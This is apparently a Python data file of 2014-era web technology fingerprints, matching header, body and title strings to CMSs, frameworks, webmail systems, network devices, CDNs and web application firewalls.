("北京阳光环球建站系统", "http://www.sunad.net.cn/wangzhanjianshe/", "10/22/2014", [{"body": ["bigSortProduct.asp?bigid"]}]),
("amazon-cloudfront", "http://aws.amazon.com/cn/cloudfront/", "10/22/2014", [{"header": ["X-Amz-Cf-Id"]}]),
("ecwapoa", "http://www.google.com.hk/#newwindow=1&q=ecwapoa", "10/22/2014", [{"body": ["ecwapoa"]}]),
("easysite", "http://huilan.com/zkhl/products/platform/easysite/index.html", "10/21/2014",
[{"body": ["GENERATOR\" content=\"EasySite"]}, {"body": ["Copyright 2009 by Huilan"]},
{"body": ["_DesktopModules_PictureNews"]}, {"header": ["EasySite-Compression"]}]),
("擎天电子政务", "http://www.skynj.com/cp/dzzw/index.htm", "10/21/2014",
[{"body": ["App_Themes/1/Style.css"]}, {"body": ["window.location = \"homepages/index.aspx"]},
{"body": ["homepages/content_page.aspx"]}]),
("asp168欧虎", "http://www.asp168.com", "10/21/2014",
[{"body": ["App_Themes/1/Style.css"]}, {"body": ["window.location = \"homepages/index.aspx"]},
{"body": ["homepages/content_page.aspx"]}]),
("锐捷应用控制引擎", "http://www.ruijie.com.cn/Product/Gateway/RG-ACE/RG-ACE", "10/21/2014",
[{"body": ["window.open(\"/login.do\",\"airWin"]}, {"title": ["锐捷应用控制引擎"]}]),
("TinyShop", "http://www.tinyrise.com/", "10/20/2014",
[{"body": ["var server_url = '/__con__/__act__';"]}, {"body": ["tiny_token_"]}]),
("ThinkSNS", "http://www.thinksns.com", "10/20/2014",
[{"body": ["_static/image/favicon.ico"]}, {"header": ["T3_lang"]}]),
("Piwik", "http://piwik.org", "10/20/2014", [{"header": ["PIWIK_SESSID"]}]),
("QingCloud", "https://www.qingcloud.com", "10/20/2014", [{"header": ["QINGCLOUDELB"]}]),
("RG-PowerCache内容加速系统", "http://www.ruijie.com.cn/", "10/17/2014", [{"title": ["RG-PowerCache"]}]),
("北京清科锐华CEMIS", "http://www.reachway.com.cn/web/cemis/introduction.aspx", "10/17/2014",
[{"body": ["/theme/2009/image", "login.asp"]}]),
("iredadmin(Roundcube?)", "http://www.iredmail.com", "10/17/2014",
[{"header": ["iredadmin"]}, {"body": ["iredadmin"]}]),
("SIMIT_framework", "", "10/16/2014", [{"header": ["SIMIT framework"]}]),
("flow_framework", "http://flow.typo3.org/home", "10/16/2014", [{"header": ["FLOW/FRAMEWORK"]}]),
("Kohana-Framework", "http://kohanaframework.org", "10/16/2014", [{"header": ["Kohana Framework"]}]),
("Restlet-Framework", "https://github.com/restlet/restlet-framework-java", "10/16/2014",
[{"header": ["Restlet-Framework"]}]),
("Play-Framework", "http://www.playframework.com", "10/16/2014", [{"header": ["Play! Framework"]}]),
("Starlet", "https://github.com/kazuho/Starlet", "10/16/2014", [{"header": ["Plack::Handler::Starlet"]}]),
("SamanPortal", "http://www.sis-eg.com", "10/16/2014", [{"header": ["sisRapid"]}]),
("Fat-FreeFramework", "http://fatfreeframework.com", "10/16/2014", [{"header": ["Fat-Free Framework"]}]),
("NetteFramework", "http://nette.org", "10/16/2014", [{"header": ["Nette Framework"]}]),
("typo3", "http://typo3.org", "10/15/2014", [{"header": ["fe_typo_user"]}]),
("irecms", "http://www.irecms.de", "10/15/2014", [{"header": ["IRe.CMS"]}]),
("MuraCMS", "http://www.getmura.com", "10/15/2014", [{"header": ["Mura CMS"]}]),
("Tncms",
"http://cn.bing.com/search?q=tncms+Xrds&go=提交&qs=n&form=QBRE&pq=tncms+xrds&sc=0-6&sp=-1&sk=&cvid=663f37af2cd849a0918ffe5212c56463",
"10/15/2014", [{"header": ["X-Tncms-Version"]}]),
("Azure_ARR",
"http://blogs.msdn.com/b/azchina/archive/2013/11/21/disabling-arr-s-instance-affinity-in-windows-azure-web-sites.aspx",
"10/15/2014", [{"header": ["ARRAffinity"]}]),
("sitecore", "http://www.sitecore.net", "10/15/2014", [{"header": ["Sitecore CMS"]}]),
("synkronvia", "http://synkronvia.com", "10/15/2014", [{"header": ["Synkron Via CMS"]}]),
("EasywebCMS", "http://www.eaysweb.se", "10/15/2014", [{"header": ["Easyweb CMS"]}]),
("UMI.CMS", "http://www.umi-cms.ru", "10/15/2014", [{"header": ["UMI.CMS"]}]),
("mozartframework", "http://mozartframework.ru", "10/15/2014", [{"header": ["Mozart Framework"]}]),
("zikula_framework", "http://zilkula.org", "10/14/2014",
[{"header": ["ZIKULASID1"]}, {"header": ["ZIKULASID2"]}, {"header": ["ZIKULASID3"]}]),
("Zikula_CMS", "http://www.zikula.de", "10/14/2014", [{"header": ["ZKSID2"]}]),
("Bad_Behavior", "http://bad-behavior.ioerror.us/", "10/14/2014", [{"header": ["bb2_screener_"]}]),
("Bigcommerce", "https://www.bigcommerce.com", "10/14/2014", [{"header": ["SHOP_SESSION_TOKEN"]}]),
("逐浪zoomla", "http://www.zoomla.cn", "10/14/2014",
[{"body": ["script src=\"http://code.zoomla.cn/"]}, {"body": ["NodePage.aspx", "Item"]},
{"body": ["/style/images/win8_symbol_140x140.png"]}]),
("微普外卖点餐系统", "http://diancan365.com/", "10/14/2014",
[{"body": ["Author\" content=\"微普外卖点餐系统"]}, {"body": ["Powered By 点餐系统"]}, {"body": ["userfiles/shoppics/"]}]),
("squarespace建站", "http://www.squarespace.com/", "10/14/2014", [{"header": ["SS_MID", "squarespace.net"]}]),
("PrestaShop", "http://www.prestashop.com", "10/13/2014",
[{"header": ["PrestaShop"]}, {"body": ["Shop powered by PrestaShop"]}]),
("ECMall", "http://ecmall.shopex.cn", "10/13/2014",
[{"header": ["ECM_ID"]}, {"body": ["generator\" content=\"ECMall"]}]),
("OpenCart", "http://www.opencart.com/", "10/13/2014",
[{"body": ["Powered By OpenCart"]}, {"body": ["catalog/view/theme"]}]),
("Magento", "http://magento.com", "10/13/2014",
[{"body": ["body", "BLANK_IMG"]}, {"body": ["Magento, Varien, E-commerce"]}]),
("Facebook_insights", "https://developers.facebook.com/docs/platforminsights", "10/13/2014",
[{"body": ["fb:app_id"]}]),
("北创图书检索系统", "http://www.bcrj.com.cn", "10/13/2014", [{"body": ["opac_two"]}]),
("Tipask", "http://www.tipask.com", "10/13/2014", [{"body": ["Tipask Team"]}]),
("HIMS酒店云计算服务", "http://www.luopan.cn", "10/13/2014",
[{"body": ["GB_ROOT_DIR", "maincontent.css"]}, {"body": ["HIMS酒店云计算服务"]}]),
("地平线CMS", "http://www.deepsoon.com/", "10/13/2014",
[{"title": ["Powered by deep soon"], "body": ["labelOppInforStyle"]},
{"body": ["search_result.aspx", "frmsearch"]}]),
("weebly", "http://www.weebly.com/", "10/13/2014",
[{"header": ["intern.weebly.net"]}, {"body": ["wsite-page-index"]}]),
("phpweb", "http://www.phpweb.net", "10/11/2014", [{"body": ["PDV_PAGENAME"]}]),
("Webmin", "http://www.webmin.cn", "10/11/2014", [{"title": ["Login to Webmin"]}, {"body": ["Webmin server on"]}]),
("mirapoint", "http://www.mirapoint.com", "10/10/2014", [{"body": ["/wm/mail/login.html"]}]),
("UFIDA_NC", "http://www.yonyou.com/product/NC.aspx", "10/10/2014", [{"body": ["UFIDA", "logo/images/"]}]),
("元年财务软件", "http://www.epochsoft.com.cn", "10/9/2014",
[{"body": ["yuannian.css"]}, {"body": ["/image/logo/yuannian.gif"]}]),
("正方教务管理系统", "http://www.zfsoft.com/type_jx/040000011001.html", "10/9/2014", [{"body": ["style/base/jw.css"]}]),
("BoyowCMS", "http://www.boyow.com/Index.html", "10/9/2014", [{"body": ["publish by BoyowCMS"]}]),
(
"ganglia", "http://ganglia.info", "10/9/2014", [{"body": ["ganglia_form.submit"]}, {"header": ["gs=unspecified"]}]),
("mantis", "http://www.mantisbt.org", "10/9/2014",
[{"body": ["browser_search_plugin.php?type=id"]}, {"body": ["MantisBT Team"]}]),
("创星伟业校园网群", "http://www.conking.com.cn", "10/9/2014", [{"body": ["javascripts/float.js", "vcxvcxv"]}]),
("TerraMaster", "http://www.terra-master.com/", "10/9/2014", [{"body": ["/js/common.js"], "title": ["vcxvcxv"]}]),
("OA企业智能办公自动化系统", "http://down.chinaz.com/soft/23657.htm", "10/9/2014",
[{"body": ["input name=\"S1\" type=\"image\"", "count/mystat.asp"]}]),
("anymacro", "http://www.anymacro.com", "10/9/2014",
[{"header": ["LOGIN_KEY"]}, {"body": ["document.aa.F_email"]}, {"body": ["AnyWebApp"]}]),
("iGENUS_webmail", "http://www.igenus.cn", "10/9/2014",
[{"body": ["script/logo_display_set.js", "check code"]}, {"body": ["top.location='login.php';"]},
{"body": ["iGENUS WEBMAIL SYSTEM"]}, {"body": ["css/igenus.css"]}]),
("gitlab", "https://about.gitlab.com/", "10/9/2014",
[{"header": ["_gitlab_session"]}, {"body": ["gon.default_issues_tracker"]},
{"body": ["GitLab Community Edition"]}]),
("trac", "http://trac.edgewall.org", "10/9/2014",
[{"body": ["<h1>Available Projects</h1>"]}, {"body": ["wiki/TracGuide"]}, {"header": ["trac_session"]}]),
("MRTG", "http://oss.oetiker.ch/mrtg/", "10/9/2014",
[{"body": ["Command line is easier to read using \"View Page Properties\" of your browser"]},
{"title": ["MRTG Index Page"]}, {"body": ["commandline was: indexmaker"]}]),
("opennms", "http://www.opennms.com", "10/9/2014",
[{"header": ["/opennms/login.jsp"]}, {"body": ["/css/gwt-asset.css"]},
{"body": ["OpenNMS® is a registered trademark of"]}]),
("Munin", "http://munin-monitoring.org", "10/9/2014",
[{"body": ["Auto-generated by Munin"]}, {"body": ["munin-month.html"]}]),
("Adiscon_LogAnalyzer", "http://loganalyzer.adiscon.com", "10/9/2014",
[{"title": ["Adiscon LogAnalyzer"]}, {"body": ["Adiscon LogAnalyzer", "Adiscon GmbH"]}]),
("Atmail", "https://www.atmail.com", "10/9/2014",
[{"body": ["Powered by Atmail"]}, {"header": ["atmail6"]}, {"body": ["FixShowMail"]}]),
("orocrm", "http://www.orocrm.com", "10/9/2014", [{"body": ["/bundles/oroui/"]}]),
("ALCASAR", "http://www.alcasar.net", "10/9/2014", [{"body": ["valoriserDiv5"]}]),
("Nagios", "http://www.nagios.org", "10/9/2014",
[{"header": ["Nagios access"]}, {"body": ["/nagios/cgi-bin/status.cgi"]}]),
("webEdition", "http://www.webedition.org", "10/9/2014", [{"body": ["generator\" content=\"webEdition"]}]),
("cart_engine", "http://www.c97.net", "10/8/2014", [{"body": ["skins/_common/jscripts.css"]}]),
("IPFire", "http://www.ipfire.org", "10/8/2014", [{"header": ["IPFire - Restricted"]}]),
("testlink", "http://testlink.org", "10/8/2014", [{"body": ["testlink_library.js"]}]),
("NOALYSS", "http://www.phpcompta.org", "10/8/2014", [{"title": ["NOALYSS"]}]),
("bacula-web", "http://www.bacula-web.org", "10/8/2014",
[{"title": ["Webacula"]}, {"title": ["Bacula Web"]}, {"title": ["Bacula-Web"]}]),
("Ultra_Electronics",
"http://en.wikipedia.org/wiki/NetillaOS_NetConnect_by_Northbridge_Secure_Systems_(Secure_Remote_Access_SSL_VPN)",
"10/8/2014", [{"body": ["/preauth/login.cgi"]}, {"body": ["/preauth/style.css"]}]),
("Osclass", "http://osclass.org/", "10/8/2014",
[{"body": ["generator\" content=\"Osclass"]}, {"header": ["osclass"]}]),
("hellobar", "http://hellobar.com", "10/8/2014", [{"body": ["hellobar.js"]}]),
("Django", "http://djangoproject.com", "10/8/2014",
[{"body": ["__admin_media_prefix__"]}, {"body": ["csrfmiddlewaretoken"]}]),
("cakephp", "http://cakephp.org", "10/8/2014", [{"header": ["CAKEPHP"]}]),
("51yes", "http://www.51yes.com", "10/8/2014", [{"body": ["51yes.com/click.aspx"]}]),
("recaptcha", "http://www.google.com/recaptcha/intro/index.html", "10/8/2014", [{"body": ["recaptcha_ajax.js"]}]),
("hubspot", "http://www.hubspot.com", "10/8/2014", [{"body": ["js.hubspot.com/analytics"]}]),
("Communique", "http://en.wikipedia.org/wiki/InSoft_Inc.#Communique", "10/8/2014", [{"header": ["Communique"]}]),
("Chromelogger", "http://craig.is/writing/chrome-logger/techspecs", "10/4/2014",
[{"header": ["X-Chromelogger-Data"]}]),
("OpenMas", "http://zj.chinamobile.com", "10/4/2014",
[{"title": ["OpenMas"]}, {"body": ["loginHead\"><link href=\"App_Themes"]}]),
("Hudson", "http://hudson-ci.org", "9/30/2014", [{"header": ["X-Hudson"]}]),
("Splunk", "http://www.splunk.com", "9/30/2014", [{"body": ["Splunk.util.normalizeBoolean"]}]),
("zenoss", "http://www.zenoss.com", "9/30/2014", [{"body": ["/zport/dmd/"]}]),
("Synology_NAS", "http://www.synology.com", "9/29/2014",
[{"header": ["webman/index.cgi"]}, {"body": ["modules/BackupReplicationApp"]}]),
("cpanel", "http://cpanel.net", "9/28/2014", [{"header": ["cprelogin:"]}]),
("WebObjects", "http://wiki.wocommunity.org/display/WEB/Home", "9/28/2014", [{"header": ["WebObjects", "wosid"]}]),
("梭子鱼防火墙", "https://www.barracuda.com/", "9/28/2014",
[{"body": ["a=bsf_product\" class=\"transbutton", "/cgi-mod/header_logo.cgi"]}]),
("梭子鱼设备", "http://www.barracudanetworks.com", "9/28/2014", [{"header": ["BarracudaHTTP"]}]),
("PHP-CGI", "http://baidu.com/?q=PHP-CGI", "9/28/2014", [{"header": ["PHP-CGI"]}]),
("微门户", "http://www.tvm.cn", "9/25/2014", [{"body": ["/tpl/Home/weimeng/common/css/"]}]),
("Amaya", "http://www.w3.org/Amaya", "9/22/2014", [{"body": ["generator\" content=\"Amaya"]}]),
("AlloyUI", "http://www.alloyui.com", "9/22/2014", [{"body": ["cdn.alloyui.com"]}]),
("Akamai", "http://akamai.com", "9/22/2014", [{"header": ["X-Akamai-Transformed"]}]),
("advancedwebstats", "http://www.advancedwebstats.com", "9/22/2014", [{"body": ["caphyon-analytics.com/aws.js"]}]),
("adriver", "http://adriver.ru", "9/22/2014", [{"body": ["ad.adriver.ru/cgi-bin"]}]),
("Adobe_RoboHelp", "http://adobe.com/products/robohelp.html", "9/22/2014",
[{"body": ["generator\" content=\"Adobe RoboHelp"]}]),
("Adobe_GoLive", "http://www.adobe.com/products/golive", "9/22/2014",
[{"body": ["generator\" content=\"Adobe GoLive"]}]),
("Adobe_ CQ5", "http://adobe.com/products/cq.html", "9/22/2014", [{"body": ["_jcr_content"]}]),
("ColdFusion", "http://adobe.com/products/coldfusion-family.html", "9/22/2014",
[{"body": ["/cfajax/"]}, {"header": ["CFTOKEN"]}, {"body": ["ColdFusion.Ajax"]}, {"body": ["cdm"]}]),
("adinfinity", "http://adinfinity.com.au", "9/22/2014", [{"body": ["adinfinity.com.au/adapt"]}]),
("addthis", "http://addthis.com", "9/22/2014", [{"body": ["addthis.com/js/"]}]),
("phpDocumentor", "http://www.phpdoc.org", "9/22/2014", [{"body": ["Generated by phpDocumentor"]}]),
("Open_AdStream", "http://xaxis.com/", "9/22/2014", [{"body": ["OAS_AD"]}]),
("Google_AdSense", "https://www.google.com/adsense", "9/22/2014", [{"body": ["googlesyndication"]}]),
("3DCART", "http://www.3dcart.com", "9/22/2014", [{"header": ["X-Powered-By: 3DCART"]}]),
("2z project", "http://2zproject-cms.ru", "9/22/2014", [{"body": ["Generator\" content=\"2z project"]}]),
("1und1", "http://1und1.de", "9/22/2014", [{"body": ["/shop/catalog/browse?sessid="]}]),
("TechartCMS", "http://www.techart.ru", "9/22/2014", [{"header": ["X-Powered-Cms: Techart CMS"]}]),
("TwilightCMS", "http://www.twl.ru", "9/22/2014", [{"header": ["X-Powered-Cms: Twilight CMS"]}]),
("WMSN", "http://wmsn.biz/", "9/22/2014", [{"header": ["X-Powered-Cms: WMSN"]}]),
("SubrionCMS", "http://www.subrion.com", "9/22/2014", [{"header": ["X-Powered-Cms: Subrion CMS"]}]),
("BPanelCMS", "http://www.bpanel.net", "9/22/2014", [{"header": ["X-Powered-Cms: BPanel CMS"]}]),
("FOXI BIZzz", "http://foxi.biz", "9/22/2014", [{"header": ["X-Powered-Cms: FOXI BIZzz"]}]),
("BitrixSiteManager", "http://www.1c-bitrix.ru", "9/22/2014", [{"header": ["X-Powered-Cms: Bitrix Site Manager"]}]),
("EleanorCMS", "http://eleanor-cms.ru", "9/22/2014", [{"header": ["Eleanor CMS"]}]),
("Z-BlogPHP", "http://www.zblogcn.com", "9/22/2014", [{"header": ["Product: Z-BlogPHP"]}]),
("Typecho", "http://typecho.org", "9/22/2014",
[{"body": ["generator\" content=\"Typecho"]}, {"body": ["强力驱动", "Typecho"]}]),
("护卫神网站安全系统", "http://www.huweishen.com", "9/19/2014", [{"title": ["护卫神.网站安全系统"]}]),
("护卫神主机管理", "http://www.huweishen.com", "9/19/2014", [{"title": ["护卫神·主机管理系统"]}]),
("LUM服务器管理", "http://www.lum.net.cn", "9/19/2014", [{"header": ["LUM_SESSION"]}]),
("蓝盾BDWebGuard", "http://www.bluedon.com/product/category/4.html", "9/18/2014",
[{"body": ["BACKGROUND: url(images/loginbg.jpg) #e5f1fc"]}]),
("MOBOTIX_Camera", "http://www.mobotix.com/", "9/18/2014", [{"header": ["MOBOTIX Camera"]}]),
("ECOR", "http://www.everfocus.de/", "9/18/2014", [{"header": ["ECOR264"]}]),
("TP-LINK", "http://www.tp-link.tw/products/?categoryid=201", "9/18/2014", [{"header": ["TP-LINK"]}]),
("HuaweiHomeGateway", "http://www.huawei.com", "9/18/2014", [{"header": ["HuaweiHomeGateway"]}]),
("APC_Management", "http://www.apc.com/", "9/18/2014",
[{"header": ["APC Management Card"]}, {"body": ["This object on the APC Management Web Server is protected"]}]),
("Allegro-Software-RomPager", "http://www.allegrosoft.com/embedded-web-server", "9/18/2014",
[{"header": ["Allegro-Software-RomPager"]}]),
("CCProxy", "http://www.ccproxy.com", "9/18/2014", [{"header": ["Server: CCProxy"]}]),
("DI-804HV", "http://www.dlink.com/xk/sq/support/product/di-804hv-broadband-vpn-router", "9/18/2014",
[{"header": ["DI-804HV"]}]),
("AirLink_modem", "http://www.airLink.com", "9/18/2014", [{"header": ["Modem@AirLink.com"]}]),
("moosefs", "http://www.moosefs.org", "9/17/2014", [{"body": ["mfs.cgi"]}, {"body": ["under-goal files"]}]),
("WHM", "http://cpanel.net/cpanel-whm/", "9/17/2014", [{"header": ["whostmgrsession"]}]),
("用友商战实践平台", "http://tradewar.135e.com", "9/17/2014", [{"body": ["Login_Main_BG", "Login_Owner"]}]),
("ZTE_MiFi_UNE", "http://www.zte.com.cn/cn/", "9/17/2014", [{"title": ["MiFi UNE 4G LTE"]}]),
("rap", "http://www.arubanetworks.com.cn/allwireless/", "9/17/2014", [{"body": ["/jscripts/rap_util.js"]}]),
("Scientific-Atlanta_Cable_Modem", "http://www.cisco.com/web/services/acquisitions/scientific-atlanta.html",
"9/17/2014", [{"title": ["Scientific-Atlanta Cable Modem"]}]),
("Aethra_Telecommunications_Operating_System", "http://www.aethra.com", "9/17/2014", [{"header": ["atos"]}]),
("Cisco_Cable_Modem", "http://www.cisco.com", "9/17/2014", [{"title": ["Cisco Cable Modem"]}]),
("Wimax_CPE", "http://www.huawei.com/cn/ProductsLifecycle/RadioAccessProducts/WiMAXProducts/hw-194630.htm",
"9/17/2014", [{"title": ["Wimax CPE Configuration"]}]),
("HFS", "http://www.rejetto.com/hfs/", "9/16/2014", [{"header": ["Server: HFS"]}]),
("Macrec_DVR", "http://macrec.co", "9/16/2014", [{"title": ["Macrec DVR"]}]),
("CrushFTP", "http://www.crushftp.com", "9/16/2014", [{"header": ["Server: CrushFTP HTTP Server"]}]),
("SMA_Sunny_Webbox", "http://www.sma-america.com/en_US/products/monitoring-systems/sunny-webbox.html", "9/16/2014",
[{"title": ["SMA Sunny Webbox"]}, {"header": ["Server: WebBox-20"]}]),
("ecshop", "http://www.ecshop.com/", "9/16/2014",
[{"title": ["Powered by ECShop"]}, {"header": ["ECS_ID"]}, {"body": ["content=\"ECSHOP"]},
{"body": ["/api/cron.php"]}]),
("gunicorn", "http://gunicorn.org", "9/16/2014", [{"header": ["gunicorn"]}]),
("Sucuri", "https://sucuri.net", "9/15/2014", [{"header": ["Sucuri/Cloudproxy"]}]),
("WebKnight", "https://www.aqtronix.com/webknight/", "9/15/2014", [{"header": ["WebKnight"]}]),
("PaloAlto_Firewall", "https://www.paloaltonetworks.com", "9/15/2014", [{"body": [
"Access to the web page you were trying to visit has been blocked in accordance with company policy"]}]),
("FortiWeb", "http://www.fortinet.com.tw/products/fortiweb/", "9/15/2014",
[{"header": ["FORTIWAFSID"]}, {"header": ["FortiWeb"]}]),
("Mod_Security", "https://www.modsecurity.org", "9/15/2014", [{"header": ["Mod_Security"]}]),
("Citrix_Netscaler", "http://www.citrix.com.tw/products/netscaler-application-delivery-controller/overview.html",
"9/15/2014", [{"header": ["ns_af"]}]),
("Dotdefender", "http://www.applicure.com/Products/dotdefender", "9/15/2014",
[{"header": ["X-Dotdefender-Denied"]}]),
("Kerio_WinRoute_Firewall", "http://winroute.ru/kerio_winroute_firewall.htm", "9/15/2014",
[{"header": ["Kerio WinRoute Firewall"]}, {"body": ["style/bodyNonauth.css"]}]),
("Motorola_SBG900",
"http://www.motorolasolutions.com/CN-ZH/Business+Solutions/Industry+Solutions/Utilities/Wireless+Broadband+Solution_CN-ZH",
"9/12/2014", [{"title": ["Motorola SBG900"]}]),
("Ruckus", "http://www.ruckuswireless.com", "9/12/2014",
[{"body": ["mon. Tell me your username"]}, {"title": ["Ruckus Wireless Admin"]}]),
("ZyXEL", "http://www.zyxel.com/cn/zh/products_services/service_provider-dsl_cpes.shtml?t=c", "9/12/2014",
[{"body": ["Forms/rpAuth_1"]}]),
("Horde", "http://www.horde.org/apps/webmail", "9/12/2014",
[{"body": ["IMP: Copyright 2001-2009 The Horde Project"]}, {"header": ["Horde3"]},
{"header": ["Set-Cookie: Horde"]}]),
("Roundcube", "http://roundcube.net", "9/12/2014", [{"header": ["roundcube_sessid"]}]),
("Comcast_Business_Gateway", "http://business.comcast.com/", "9/12/2014", [{"body": ["Comcast Business Gateway"]}]),
("teamportal", "http://www.teamsystem.com", "9/12/2014", [{"body": ["TS_expiredurl"]}]),
("Lotus-Domino", "http://www-03.ibm.com/software/products/en/ibmdomino", "9/12/2014",
[{"header": ["Server: Lotus-Domino"]}]),
("Lotus", "http://ibm.com", "9/12/2014", [{"title": ["IBM Lotus iNotes Login"]}, {"body": ["iwaredir.nsf"]}]),
("arrisi_Touchstone", "http://www.arrisi.com/products/touchstone/", "9/12/2014",
[{"title": ["Touchstone Status"]}, {"body": ["passWithWarnings"]}]),
("Zimbra", "http://www.zimbra.com", "9/12/2014", [{"header": ["ZM_TEST"]}]),
("DnP Firewall", "http://ipv6.google.com.hk/search?q=DnP+Firewall", "9/12/2014",
[{"body": ["Powered by DnP Firewall"]}, {"body": ["dnp_firewall_redirect"]}]),
("BinarySec", "http://www.binarysec.com/", "9/12/2014", [{"header": ["X-Binarysec-Via"]}]),
("AnZuWAF", "http://www.fsg2.org", "9/12/2014", [{"header": ["AnZuWAF"]}]),
("Safe3WAF", "http://www.safe3.com.cn", "9/12/2014", [{"header": ["Safe3WAF"]}]),
("AOLserver", "http://aolserver.sourceforge.net", "9/12/2014", [{"header": ["AOLserver"]}]),
("D-Link", "http://www.dlink.com.hk/products/?pid=446", "9/12/2014",
[{"title": ["D-Link VoIP Wireless Router"]}, {"title": ["D-LINK SYSTEMS"]}]),
("FreeboxOS", "http://www.free.fr/assistance/5056.html", "9/12/2014",
[{"title": ["Freebox OS"]}, {"body": ["logo_freeboxos"]}]),
("MediaWiki", "http://www.mediawiki.org/wiki/MediaWiki", "9/11/2014",
[{"body": ["generator\" content=\"MediaWiki"]}, {"body": ["/wiki/images/6/64/Favicon.ico"]},
{"body": ["Powered by MediaWiki"]}]),
("Jenkins", "http://jenkins-ci.org", "9/11/2014",
[{"header": ["X-Jenkins-Session"]}, {"body": ["translation.bundles"]}, {"header": ["X-Jenkins"]}]),
("reviewboard", "https://www.reviewboard.org", "9/11/2014",
[{"body": ["/static/rb/images/delete"]}, {"header": ["rbsessionid"]}]),
("Phabricator", "http://phabricator.org", "9/11/2014",
[{"header": ["phsid"]}, {"body": ["phabricator-application-launch-container"]}, {"body": ["res/phabricator"]}]),
("mod_auth_passthrough", "http://cpanel.net", "9/11/2014", [{"header": ["mod_auth_passthrough"]}]),
("mod_bwlimited", "http://ipv6.google.com.hk/search?q=mod_bwlimited", "9/11/2014", [{"header": ["mod_bwlimited"]}]),
("OpenSSL", "http://openssl.org", "9/11/2014", [{"header": ["OpenSSL"]}]),
("lemis管理系统", "http://www.baidu.com/s?wd=lemis%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F", "9/11/2014",
[{"body": ["lemis.WEB_APP_NAME"]}]),
("unknown_cms_rcms", "http://fofa.so/", "9/11/2014", [{"body": ["r/cms/www"]}, {"header": ["clientlanguage"]}]),
("joomla-facebook", "https://www.sourcecoast.com/joomla-facebook/", "9/11/2014",
[{"header": ["jfbconnect_permissions_granted"]}]),
("ranzhi", "http://www.ranzhi.org", "9/11/2014",
[{"body": ["/sys/index.php?m=user&f=login&referer="]}, {"header": ["rid", "theme", "lang"]}]),
("chanzhi", "http://www.chanzhi.org", "9/11/2014", [{"body": ["chanzhi.js"]}, {"header": ["Set-Cookie: frontsid"]},
{"body": ["poweredBy'><a href='http://www.chanzhi.org"]}]),
("unbouncepages", "http://unbouncepages.com", "9/11/2014", [{"header": ["X-Unbounce-Pageid"]}]),
("unknown_cms", "http://ipv6.google.com.hk/#q=%22Requestsuccess4ajax%22", "9/11/2014",
[{"header": ["Requestsuccess4ajax"]}]),
("Alternate-Protocol", "http://www.chromium.org/spdy/spdy-protocol/spdy-protocol-draft2", "9/11/2014",
[{"header": ["Alternate-Protocol"]}]),
("pagespeed", "https://github.com/pagespeed", "9/11/2014",
[{"header": ["X-Page-Speed"]}, {"header": ["X-Mod-Pagespeed"]}]),
("TRSMAS", "http://www.trs.com.cn", "9/11/2014", [{"header": ["X-Mas-Server"]}]),
("Wp-Super-Cache", "https://wordpress.org/plugins/wp-super-cache/", "9/11/2014", [{"header": ["Wp-Super-Cache"]}]),
("Cocoon", "http://cocoon.apache.org", "9/11/2014", [{"header": ["X-Cocoon-Version"]}]),
("LiquidGIS", "http://www.liquidgis.com/", "9/11/2014", [{"header": ["Productname: LiquidGIS"]}]),
("Cacti", "http://www.cacti.net", "9/11/2014", [{"header": ["Set-Cookie: Cacti="]}, {"title": ["Login to Cacti"]},
{"body": ["/plugins/jqueryskin/include/login.css"]}]),
("Cactiez", "http://www.cactiez.com", "9/11/2014", [{"header": ["Cactiez"]}]),
("uPlusFtp", "http://www.erisesoft.com/cn/uplusftp.htm", "9/11/2014", [{"header": ["uPlusFtp"]}]),
("SJSWS_ OiWS", "http://www.oracle.com/technetwork/middleware/webtier/overview/index.html#iWS", "9/11/2014",
[{"header": ["Oracle-iPlanet-Web-Server"]}, {"header": ["Sun-Java-System-Web-Server"]}]),
("SJSWPS_ OiWPS", "http://www.oracle.com/technetwork/middleware/webtier/overview/index.html#iPS", "9/11/2014",
[{"header": ["Sun-Java-System-Web-Proxy-Server"]}, {"header": ["Oracle-iPlanet-Proxy-Server"]}]),
("Blackboard", "http://www.blackboard.com/Platforms/Learn/overview.aspx", "9/11/2014",
[{"header": ["X-Blackboard-Product"]}, {"header": ["X-Blackboard-Appserver"]}]),
("Adblock", "https://adblockplus.org", "9/11/2014", [{"header": ["X-Adblock-Key"]}]),
("Kooboocms", "http://kooboo.com", "9/11/2014", [{"header": ["Kooboocms"]}]),
("安慧网盾", "http://www.huianquan.com", "9/11/2014", [{"header": ["Protected-By: AnHui Web Firewall"]}]),
("plone", "http://plone.org/", "9/11/2014",
[{"header": ["plone.content"]}, {"body": ["generator\" content=\"Plone"]}]),
("ManagedFusion", "http://managedfusion.com/products/url-rewriter/", "9/11/2014", [{"header": ["ManagedFusion"]}]),
("X-72e-Nobeian-Transfer", "http://ipv6.google.com.hk/#q=%22X-72e-Nobeian-Transfe", "9/11/2014",
[{"header": ["X-72e-Nobeian-Transfer"]}]),
("P3p_enabled", "http://www.w3.org/P3P/", "9/11/2014", [{"header": ["P3p: CP"]}]),
("Oraclea-DMS", "http://docs.oracle.com/cd/E21764_01/core.1111/e10108/dms.htm#ASPER295", "9/11/2014",
[{"header": ["X-Oracle-Dms-Ecid"]}]),
("Powercdn", "http://www.powercdn.com", "9/11/2014", [{"header": ["Powercdn"]}]),
("Iisexport", "http://www.adsonline.co.uk/iisexport/documentation/", "9/11/2014", [{"header": ["Iisexport"]}]),
("DotNetNuke", "http://www.dnnsoftware.com/", "9/11/2014",
[{"header": ["DotNetNukeAnonymous"]}, {"header": ["Dnnoutputcache"]}]),
("Dnnoutputcache", "http://www.dnnsoftware.com/", "9/11/2014", [{"header": ["Dnnoutputcache"]}]),
("rack-cache", "http://rtomayko.github.io/rack-cache/", "9/11/2014", [{"header": ["X-Rack-Cache"]}]),
("wspx", "http://ipv6.google.com.hk/search?q=%22X-Copyright:+wspx", "9/11/2014",
[{"header": ["X-Copyright: wspx"]}, {"header": ["X-Powered-By: ANSI C"]}]),
("CodeIgniter", "https://ellislab.com/codeigniter", "9/11/2014", [{"header": ["ci_session"]}]),
("CEMIS", "http://www.reachway.com.cn/web/cemis/introduction.aspx", "9/10/2014",
[{"title": ["综合项目管理系统登录"], "body": ["<div id=\"demo\" style=\"overflow:hidden"]}]),
("云因网上书店", "http://www.yunyin.com/product/product12.cfm?iType=12&sProName=%D4%C6%D2%F2%CD%F8%D5%BE%CF%B5%CD%B3",
"9/10/2014", [{"body": ["main/building.cfm"]}, {"body": ["href=\"../css/newscomm.css"]}]),
("bit-service", "http://www.bit-service.com/index.html", "9/10/2014",
[{"body": ["bit-xxzs"]}, {"body": ["xmlpzs/webissue.asp"]}]),
